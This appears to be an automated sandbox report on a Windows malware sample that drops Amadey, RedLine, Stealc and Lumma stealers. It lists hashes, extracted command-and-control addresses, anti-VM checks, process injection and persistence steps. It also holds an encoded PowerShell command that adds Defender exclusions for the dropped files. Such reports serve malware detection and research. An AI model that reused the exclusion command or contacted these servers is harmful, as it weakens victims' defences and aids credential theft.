amadey | bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13

Analysis

max time kernel
300s
max time network
293s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
01-07-2024 05:07

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Size

1.9MB
MD5

eaa443f37443cb7221d63e0891243384
SHA1

d3242326b2ac1ae6e9817a49df33c3a79e209aee
SHA256

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13
SHA512

8405c44c1eea8578224eb6495f689d66e4e2f6503c0bf08d3c111e4e307603a35089649296ebf89b76d339c9517a83133b741c655097a9fe319f25aae1f6afdb
SSDEEP

49152:6YyPZ96v5ohNyPiYPl5A7E2+P75+Zg6RenX1IAhTiz8wPT:kBSPiYNK7mP91/TOQ

Score

10^/10

amadey lumma redline stealc e76b71 jopa livetraffoc newbuild newlogs zov discovery evasion infostealer persistence spyware stealer trojan

Malware Config

Extracted

Family

amadey

Version

8254624243

Botnet

e76b71

http://77.91.77.81

Attributes

install_dir
8254624243
install_file
axplong.exe
strings_key
90049e51fabf09df0d6748e0b271922e
url_paths
/Kiru9gu/index.php

rc4.plain

Extracted

Family

stealc

Botnet

jopa

http://65.21.175.0

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

LiveTraffoc

4.185.56.82:42687

Extracted

Family

redline

Botnet

newlogs

85.28.47.7:17210

Extracted

Family

stealc

Botnet

ZOV

http://40.86.87.10

Attributes

url_path
/108e010e8f91c38c.php

Extracted

Family

redline

Botnet

newbuild

185.215.113.67:40960

Extracted

Family

lumma

https://groundsmooors.shop/api

https://potterryisiw.shop/api

https://foodypannyjsud.shop/api

https://contintnetksows.shop/api

https://reinforcedirectorywd.shop/api

Signatures

Amadey
Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.
trojan amadey
Lumma Stealer
An infostealer written in C++ first seen in August 2022.
stealer lumma
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 5 IoCs

Processes:

resource	yara_rule
behavioral2/memory/3356-127-0x0000000000400000-0x0000000000450000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe	family_redline
behavioral2/memory/4272-148-0x0000000000AE0000-0x0000000000B30000-memory.dmp	family_redline
C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe	family_redline
behavioral2/memory/4908-198-0x00000000004E0000-0x0000000000530000-memory.dmp	family_redline

Stealc
Stealc is an infostealer written in C++.
stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 6 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

axplong.exebef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	axplong.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 12 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	axplong.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	axplong.exe

Executes dropped EXE 22 IoCs

Processes:

axplong.exestreamer.exeTpWWMUpe0LEV.exeFreshbuild.execrypt6.exeHkbsse.exenewlogs.exestealc_zov.exe1.exenewbuild.exerealtekdriver.exeHkbsse.exeaxplong.exerealtekdriver.exeHkbsse.exeaxplong.exeaxplong.exeHkbsse.exeHkbsse.exeaxplong.exeaxplong.exeHkbsse.exe

pid	process
4036	axplong.exe
1756	streamer.exe
2244	TpWWMUpe0LEV.exe
4400	Freshbuild.exe
2288	crypt6.exe
4976	Hkbsse.exe
4272	newlogs.exe
4408	stealc_zov.exe
4088	1.exe
4908	newbuild.exe
4668	realtekdriver.exe
5364	Hkbsse.exe
6064	axplong.exe
5852	realtekdriver.exe
1688	Hkbsse.exe
64	axplong.exe
5928	axplong.exe
5244	Hkbsse.exe
816	Hkbsse.exe
1628	axplong.exe
5776	axplong.exe
5820	Hkbsse.exe

Identifies Wine through registry keys 2 TTPs 6 IoCs

Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	axplong.exe
Key opened	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Wine	axplong.exe

Loads dropped DLL 1 IoCs

Processes:

TpWWMUpe0LEV.exe

pid process

2244 TpWWMUpe0LEV.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

pid	process
2244	TpWWMUpe0LEV.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

realtekdriver.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-160447019-1232603106-4168707212-1000\Software\Microsoft\Windows\CurrentVersion\Run\ScannerService = "C:\\Users\\Admin\\AppData\\Roaming\\ScannerService.exe"	realtekdriver.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 bitbucket.org
3 bitbucket.org
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exeaxplong.exe

pid process

2272 bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
4036 axplong.exe
6064 axplong.exe
64 axplong.exe
5928 axplong.exe
1628 axplong.exe

flow	ioc
2	bitbucket.org
3	bitbucket.org

Suspicious use of SetThreadContext 4 IoCs

Processes:

TpWWMUpe0LEV.execrypt6.exestreamer.exerealtekdriver.exe

description	pid	process	target process
PID 2244 set thread context of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2288 set thread context of 3356	2288	crypt6.exe	RegAsm.exe
PID 1756 set thread context of 1688	1756	streamer.exe	BitLockerToGo.exe
PID 4668 set thread context of 5852	4668	realtekdriver.exe	realtekdriver.exe

Drops file in Windows directory 3 IoCs

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeFreshbuild.exerealtekdriver.exe

description	ioc	process
File created	C:\Windows\Tasks\axplong.job	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
File created	C:\Windows\Tasks\Hkbsse.job	Freshbuild.exe
File created	C:\Windows\Tasks\Test Task17.job	realtekdriver.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 3 IoCs

Processes:

WerFault.exeWerFault.exeWerFault.exe

pid pid_target process target process

1224 2288 WerFault.exe crypt6.exe
220 4088 WerFault.exe 1.exe
5624 924 WerFault.exe aspnet_regiis.exe

pid	pid_target	process	target process
1224	2288	WerFault.exe	crypt6.exe
220	4088	WerFault.exe	1.exe
5624	924	WerFault.exe	aspnet_regiis.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

1.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	1.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

aspnet_regiis.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	aspnet_regiis.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	aspnet_regiis.exe

Suspicious behavior: EnumeratesProcesses 21 IoCs

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeRegAsm.exeaxplong.exepowershell.exeaspnet_regiis.exeaxplong.exeaxplong.exeaxplong.exe

pid	process
2272	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
2272	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
4036	axplong.exe
4036	axplong.exe
3356	RegAsm.exe
3356	RegAsm.exe
3356	RegAsm.exe
3356	RegAsm.exe
6064	axplong.exe
6064	axplong.exe
5708	powershell.exe
5708	powershell.exe
5708	powershell.exe
924	aspnet_regiis.exe
924	aspnet_regiis.exe
64	axplong.exe
64	axplong.exe
5928	axplong.exe
5928	axplong.exe
1628	axplong.exe
1628	axplong.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

realtekdriver.exeRegAsm.exepowershell.exe

description pid process

Token: SeDebugPrivilege 4668 realtekdriver.exe
Token: SeDebugPrivilege 3356 RegAsm.exe
Token: SeDebugPrivilege 4668 realtekdriver.exe
Token: SeDebugPrivilege 5708 powershell.exe

description	pid	process
Token: SeDebugPrivilege	4668	realtekdriver.exe
Token: SeDebugPrivilege	3356	RegAsm.exe
Token: SeDebugPrivilege	4668	realtekdriver.exe
Token: SeDebugPrivilege	5708	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exeaxplong.exeTpWWMUpe0LEV.exeFreshbuild.execrypt6.exeHkbsse.exestreamer.exe

description	pid	process	target process
PID 2272 wrote to memory of 4036	2272	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe	axplong.exe
PID 2272 wrote to memory of 4036	2272	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe	axplong.exe
PID 2272 wrote to memory of 4036	2272	bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe	axplong.exe
PID 4036 wrote to memory of 1756	4036	axplong.exe	streamer.exe
PID 4036 wrote to memory of 1756	4036	axplong.exe	streamer.exe
PID 4036 wrote to memory of 2244	4036	axplong.exe	TpWWMUpe0LEV.exe
PID 4036 wrote to memory of 2244	4036	axplong.exe	TpWWMUpe0LEV.exe
PID 4036 wrote to memory of 2244	4036	axplong.exe	TpWWMUpe0LEV.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 2244 wrote to memory of 924	2244	TpWWMUpe0LEV.exe	aspnet_regiis.exe
PID 4036 wrote to memory of 4400	4036	axplong.exe	Freshbuild.exe
PID 4036 wrote to memory of 4400	4036	axplong.exe	Freshbuild.exe
PID 4036 wrote to memory of 4400	4036	axplong.exe	Freshbuild.exe
PID 4036 wrote to memory of 2288	4036	axplong.exe	crypt6.exe
PID 4036 wrote to memory of 2288	4036	axplong.exe	crypt6.exe
PID 4036 wrote to memory of 2288	4036	axplong.exe	crypt6.exe
PID 4400 wrote to memory of 4976	4400	Freshbuild.exe	Hkbsse.exe
PID 4400 wrote to memory of 4976	4400	Freshbuild.exe	Hkbsse.exe
PID 4400 wrote to memory of 4976	4400	Freshbuild.exe	Hkbsse.exe
PID 2288 wrote to memory of 3092	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3092	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3092	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3368	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3368	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3368	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 4208	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 4208	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 4208	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 5100	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 5100	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 5100	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 2288 wrote to memory of 3356	2288	crypt6.exe	RegAsm.exe
PID 4036 wrote to memory of 4272	4036	axplong.exe	newlogs.exe
PID 4036 wrote to memory of 4272	4036	axplong.exe	newlogs.exe
PID 4036 wrote to memory of 4272	4036	axplong.exe	newlogs.exe
PID 4036 wrote to memory of 4408	4036	axplong.exe	stealc_zov.exe
PID 4036 wrote to memory of 4408	4036	axplong.exe	stealc_zov.exe
PID 4036 wrote to memory of 4408	4036	axplong.exe	stealc_zov.exe
PID 4976 wrote to memory of 4088	4976	Hkbsse.exe	1.exe
PID 4976 wrote to memory of 4088	4976	Hkbsse.exe	1.exe
PID 4976 wrote to memory of 4088	4976	Hkbsse.exe	1.exe
PID 4036 wrote to memory of 4908	4036	axplong.exe	newbuild.exe
PID 4036 wrote to memory of 4908	4036	axplong.exe	newbuild.exe
PID 4036 wrote to memory of 4908	4036	axplong.exe	newbuild.exe
PID 4036 wrote to memory of 4668	4036	axplong.exe	realtekdriver.exe
PID 4036 wrote to memory of 4668	4036	axplong.exe	realtekdriver.exe
PID 4036 wrote to memory of 4668	4036	axplong.exe	realtekdriver.exe
PID 1756 wrote to memory of 1688	1756	streamer.exe	BitLockerToGo.exe
PID 1756 wrote to memory of 1688	1756	streamer.exe	BitLockerToGo.exe
PID 1756 wrote to memory of 1688	1756	streamer.exe	BitLockerToGo.exe

C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe
"C:\Users\Admin\AppData\Local\Temp\bef6f82a9c4064f8639e804036f460bafdd01eec87a355e247775d315b76db13.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2272

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
"C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4036

C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
"C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1756

C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
4⤵
PID:1688

C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
"C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe"
3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2244

C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
4⤵
- Checks processor information in registry
- Suspicious behavior: EnumeratesProcesses
PID:924

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 924 -s 1116
5⤵
- Program crash
PID:5624

C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000125001\Freshbuild.exe"
3⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:4400

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
"C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4976

C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe
"C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe"
5⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
PID:4088

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4088 -s 504
6⤵
- Program crash
PID:220

C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe
"C:\Users\Admin\AppData\Local\Temp\1000128001\crypt6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2288

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:3092

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:3368

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:4208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
PID:5100

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3356

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2288 -s 352
4⤵
- Program crash
PID:1224

C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe
"C:\Users\Admin\AppData\Local\Temp\1000130001\newlogs.exe"
3⤵
- Executes dropped EXE
PID:4272

C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe
"C:\Users\Admin\AppData\Local\Temp\1000131001\stealc_zov.exe"
3⤵
- Executes dropped EXE
PID:4408

C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe
"C:\Users\Admin\AppData\Local\Temp\1000132001\newbuild.exe"
3⤵
- Executes dropped EXE
PID:4908

C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
"C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"
3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:4668

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAMQAwADAAMAAxADMANQAwADAAMQBcAHIAZQBhAGwAdABlAGsAZAByAGkAdgBlAHIALgBlAHgAZQA7ACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUAByAG8AYwBlAHMAcwAgAHIAZQBhAGwAdABlAGsAZAByAGkAdgBlAHIALgBlAHgAZQA7AEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABBAGQAbQBpAG4AXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAFMAYwBhAG4AbgBlAHIAUwBlAHIAdgBpAGMAZQAuAGUAeABlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAUwBjAGEAbgBuAGUAcgBTAGUAcgB2AGkAYwBlAC4AZQB4AGUA
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5708

C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe
"C:\Users\Admin\AppData\Local\Temp\1000135001\realtekdriver.exe"
4⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:5852

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:6064

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5364

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:1688

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:64

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:5928

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5244

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:816

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1628

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Executes dropped EXE
PID:5776

C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\b66a8ae076\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:5820

Network

MITRE ATT&CK Matrix ATT&CK v13

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1000028001\1.exe
Filesize
240KB

MD5
b5b04a1ea6d55d9b62d90de0d89a0199

SHA1
567cb7d6182173e4a00356bd7d770c2625cfc0f5

SHA256
5c14b695450b36c84924c067f8e38374ca05d814293d26ca2e0d0ac02ec4eaa8

SHA512
d398d441e71bf1176a12e8834674d3c19e95c29824ffc718acb4bc114d7318b7bc6d859dd60710062150142afa4336acd8fbb5c5a600465c4799b833cc9bacef

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000111001\streamer.exe
Filesize
6.2MB

MD5
b9265c31743db2e9698a08df7b0c5e9d

SHA1
aa01367b13f827a5773d0781692809ae175bc718

SHA256
b2a10d42ed9b902a6a4a40b47da8448c9fa61f268f3ffb37d08bd5f5e213a0af

SHA512
1678d62ad17ce27394599f2835f3c1f209f544fdfae4c54034e7da06936768fe487a55811d9f0919018113af50153437ea0631968814910db69df0ffda36a133

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000112001\TpWWMUpe0LEV.exe
Filesize
1.2MB

MD5
242214131486132e33ceda794d66ca1f

SHA1
4ce34fd91f5c9e35b8694007b286635663ef9bf2

SHA256
bac402b5749b2da2211db6d2404c1c621ccd0c2e5d492eb6f973b3e2d38dd361

SHA512
031e0904d949cec515f2d6f2b5e4b9c0df03637787ff14f20c58e711c54eec77d1f22aa0cf0f6efd65362c1fc0066645d5d005c6a77fe5b169427cdd42555d29

Download Submit
C:\Users\Admin\AppData\Local\Temp\1000115001\build.exe
Filesize
26KB

MD5
b7d2c1f174eefb2691c5e9e54646bcf8

SHA1
a1426c9956551085b76f8480efa9213c1f445e25

SHA256
d945daff39e54640dba27324fa0472c25e1a0ca8bffdf4b31c499aa3bc88a1e2

SHA512
